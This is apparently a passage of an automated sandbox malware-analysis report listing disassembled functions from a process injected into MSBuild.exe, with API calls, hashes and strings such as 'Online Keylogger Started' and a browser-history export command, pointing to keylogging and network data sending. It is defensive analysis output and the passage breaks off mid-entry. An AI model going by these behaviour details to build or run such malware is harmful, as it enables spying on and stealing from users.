                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                            • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                                                            • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                            • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                                                                                            Function 0044A73E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 0-1979702588
                                                                                                                                            • Opcode ID: 6d78242ad949aa287355d1c9ddffbc699236c050d17e4fcfb67a5a8026bb2b6a
                                                                                                                                            • Instruction ID: a0d53aee4b5e9eea03328ee1fc287b0911d13aa7d57878389234cb538b708088
                                                                                                                                            • Opcode Fuzzy Hash: 6d78242ad949aa287355d1c9ddffbc699236c050d17e4fcfb67a5a8026bb2b6a
                                                                                                                                            • Instruction Fuzzy Hash: 3251B671D802099BEF14EFA5C845FAFBBB4EF09314F14005BE804A7252DA799952C76B
                                                                                                                                            Function 00416751 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                                                                                            • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                                                                                            • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                                                            • String ID: (FG
                                                                                                                                            • API String ID: 3142014140-2273637114
                                                                                                                                            • Opcode ID: 632929880f3897dc225356c3fd8fc529f83d4e6927153ab9b442b8a3d3f73b3f
                                                                                                                                            • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                                                                                            • Opcode Fuzzy Hash: 632929880f3897dc225356c3fd8fc529f83d4e6927153ab9b442b8a3d3f73b3f
                                                                                                                                            • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                                                                                            Function 004095D6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 158COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                                              • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,00F1A798,00000010), ref: 004042A5
                                                                                                                                              • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                                                            • String ID: XCG$`AG$>G
                                                                                                                                            • API String ID: 2334542088-2372832151
                                                                                                                                            • Opcode ID: b1869af57b07db370673fff23365936bf3c7d3263b17e0aa9e3b0b370ee1b369
                                                                                                                                            • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                                                            • Opcode Fuzzy Hash: b1869af57b07db370673fff23365936bf3c7d3263b17e0aa9e3b0b370ee1b369
                                                                                                                                            • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                                                            Function 00451C1B Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 00451D30
                                                                                                                                              • Part of subcall function 00451B20: __alloca_probe_16.LIBCMT ref: 00451B89
                                                                                                                                              • Part of subcall function 00451B20: WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00451BE6
                                                                                                                                              • Part of subcall function 00451B20: __freea.LIBCMT ref: 00451BEF
                                                                                                                                            • _free.LIBCMT ref: 00451C86
                                                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00451CC1
                                                                                                                                              • Part of subcall function 00448706: HeapAlloc.KERNEL32(00000008,0000000A,00000000,?,00446F74,00000001,00000364,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000,?), ref: 00448747
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorHeapLast_free$AllocByteCharFreeMultiWide__alloca_probe_16__freea
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 1317440246-1979702588
                                                                                                                                            • Opcode ID: fa74662142cd5858ff4d6864a187426225f9c372d33f4ac9e114e584781b7c87
                                                                                                                                            • Instruction ID: c6ec1e06e337034457c3d1db3d46831115e874e6a46b9bc6e897cbe113f52fcc
                                                                                                                                            • Opcode Fuzzy Hash: fa74662142cd5858ff4d6864a187426225f9c372d33f4ac9e114e584781b7c87
                                                                                                                                            • Instruction Fuzzy Hash: D641E271900129ABEF219F269C41F9F7BB9AF45311F00449BFC08E6252EA39DD58CB65
                                                                                                                                            Function 0044DB34 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 132COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Info
                                                                                                                                            • String ID: $fD$u;~/
                                                                                                                                            • API String ID: 1807457897-3194217865
                                                                                                                                            • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                                                            • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                                                                            • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                                                                            • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                                                                            Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000104), ref: 10004C1D
                                                                                                                                            • _free.LIBCMT ref: 10004CE8
                                                                                                                                            • _free.LIBCMT ref: 10004CF2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                            • API String ID: 2506810119-4083458154
                                                                                                                                            • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                            • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                            • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                            • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                            Function 0044A526 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,00000000,00000000,?,?,0044A885,?,00000000,00000000), ref: 0044A5D9
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0044A885,?,00000000,00000000,00000000,00000000,0000000C,00000000,0043B9C4,?), ref: 0044A607
                                                                                                                                            • GetLastError.KERNEL32(?,0044A885,?,00000000,00000000,00000000,00000000,0000000C,00000000,0043B9C4,?,00000000,?,?,00000000,?), ref: 0044A638
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 2456169464-1979702588
                                                                                                                                            • Opcode ID: 621bf0c1c67a676715650635e46187976756a7eb78e29c7ac37f1541967573e5
                                                                                                                                            • Instruction ID: dc7531123441a19c3ee305163ef761203b99fa3854004c878a1c9c286cd50013
                                                                                                                                            • Opcode Fuzzy Hash: 621bf0c1c67a676715650635e46187976756a7eb78e29c7ac37f1541967573e5
                                                                                                                                            • Instruction Fuzzy Hash: 53318171A00219AFDB14CF59DD819EAB7B8EF08315F0544BEE90AD7250DA34ED90CF69
                                                                                                                                            Function 00451B20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00451B89
                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00451BE6
                                                                                                                                            • __freea.LIBCMT ref: 00451BEF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide__alloca_probe_16__freea
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 3062693170-1979702588
                                                                                                                                            • Opcode ID: e4ae6a56f47343d6a4e817a68448cb8505c261703d196ad0df8916a7290acf6a
                                                                                                                                            • Instruction ID: cd1b4bee94903b533452e24c1937292037e85c1f197a8edfb9b0fd0890e2033c
                                                                                                                                            • Opcode Fuzzy Hash: e4ae6a56f47343d6a4e817a68448cb8505c261703d196ad0df8916a7290acf6a
                                                                                                                                            • Instruction Fuzzy Hash: BC313972A00116ABDB208FA5CC41EAF7BA5DF40310F04476AFC14DB292EB38DD84C794
                                                                                                                                            Function 00403A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76E23530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                                              • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                            • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                            • String ID: /sort "Visit Time" /stext "$8>G
                                                                                                                                            • API String ID: 368326130-2663660666
                                                                                                                                            • Opcode ID: 03d025f5093637cf68c7e3e5187cd53dd33040ecfd3fb4839ff056847571c0a6
                                                                                                                                            • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                                                                                            • Opcode Fuzzy Hash: 03d025f5093637cf68c7e3e5187cd53dd33040ecfd3fb4839ff056847571c0a6
                                                                                                                                            • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                                                                                            Function 0044816A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 004481DD
                                                                                                                                            • _free.LIBCMT ref: 00448233
                                                                                                                                              • Part of subcall function 0044800F: _free.LIBCMT ref: 00448067
                                                                                                                                              • Part of subcall function 0044800F: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                                                              • Part of subcall function 0044800F: WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                                                              • Part of subcall function 0044800F: WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 314583886-1979702588
                                                                                                                                            • Opcode ID: d03f4a1b80500958f891a3cbcf706bb6a5bc2e9501f696f47c91c4298fadc783
                                                                                                                                            • Instruction ID: 199b356aa642283adb8c254b31611cf5f7507bdd3411797779e7419f4dff9485
                                                                                                                                            • Opcode Fuzzy Hash: d03f4a1b80500958f891a3cbcf706bb6a5bc2e9501f696f47c91c4298fadc783
                                                                                                                                            • Instruction Fuzzy Hash: 6C213B72800518A7EB31A7259C41DEFB778EB83364F1102EFF899B2181DF784D86859A
                                                                                                                                            Function 0040A876 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                                                            • wsprintfW.USER32 ref: 0040A905
                                                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EventLocalTimewsprintf
                                                                                                                                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                                                            • API String ID: 1497725170-1359877963
                                                                                                                                            • Opcode ID: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                                                                            • Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
                                                                                                                                            • Opcode Fuzzy Hash: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
                                                                                                                                            • Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
                                                                                                                                            Function 0040A611 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                                                              • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                            • String ID: Online Keylogger Started
                                                                                                                                            • API String ID: 112202259-1258561607
                                                                                                                                            • Opcode ID: c0aab962c7ca1211a7ad70a8f3b20d3c2f1fab31e78c15f9791034d849591584
                                                                                                                                            • Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
                                                                                                                                            • Opcode Fuzzy Hash: c0aab962c7ca1211a7ad70a8f3b20d3c2f1fab31e78c15f9791034d849591584
                                                                                                                                            • Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
                                                                                                                                            Function 0044AA73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
                                                                                                                                            • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                            • String ID: `@
                                                                                                                                            • API String ID: 2583163307-951712118
                                                                                                                                            • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                            • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                                                                            • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                                                            • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                                                                            Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
                                                                                                                                            • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseEventHandleObjectSingleWait
                                                                                                                                            • String ID: Connection Timeout
                                                                                                                                            • API String ID: 2055531096-499159329
                                                                                                                                            • Opcode ID: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                                                                            • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                                                                            • Opcode Fuzzy Hash: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
                                                                                                                                            • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                                                                            Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                                                              • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                                                                              • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                                                            • String ID: bad locale name
                                                                                                                                            • API String ID: 3628047217-1405518554
                                                                                                                                            • Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
                                                                                                                                            • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
